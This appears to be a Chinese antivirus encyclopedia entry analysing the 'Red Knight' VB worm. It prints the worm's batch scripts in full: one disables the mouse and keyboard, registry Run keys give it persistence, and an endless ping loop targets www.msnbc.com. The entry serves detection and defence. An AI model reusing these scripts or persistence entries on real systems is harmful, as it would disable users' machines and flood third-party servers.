病毒别名：P2P-Worm.Win32.VB.ci[AVP]

处理时间：

威胁级别：★★

中文名称：红色骑士

病毒类型：蠕虫

影响系统：Win9x / WinNT

病毒行为:

这是一个用VB编写的蠕虫病毒，由于该病毒的编写存在某些问题，所以不管是在9X系统还是在NT系统下该病毒都只能实现部分功能。病毒会将自己拷贝到C:\\My shared folder这个共享文件夹里面来通过共享传播，病毒还会尝试禁止使用鼠标和键盘，不停地向某个网站的服务器发送数据包。

1)病毒将自己拷贝到：

C:\\command.com

C:\\windows\\default.pif

C:\\My shared folder\\.[随机数字].exe（8个病毒名由随机数字组成的副本）

2)建立一个批处理C:\\.[随机数字].bat来尝试禁止使用鼠标和键盘，但是该功能没有实现。

该批处理的内容是：

attrib +h c:\\.[随机数字].bat

@echo off

cd c:\\windows

rundll32.exe mouse,disable

rundll32.exe keyboard,disable

通过在注册表中添加启动项来运行该批处理：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

"disble"="c:\\.[随机数字].bat"

3)在注册表中为病毒添加启动项：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

tskmgr=[源病毒路径]

4)建立一个批处理c:\\windows\\ddos.bat来向www.msnbc.com的服务器不停地发送数据包：

@echo off

attrib +h +s +a +r c:\\windows\\ddos.bat

:loop

ping www.msnbc.com

goto loop

5)病毒体中的一句话：

Hey There Little Red Riding Hood, Your so raw looking good. Your everything a big bad wolf could want. -- Rooted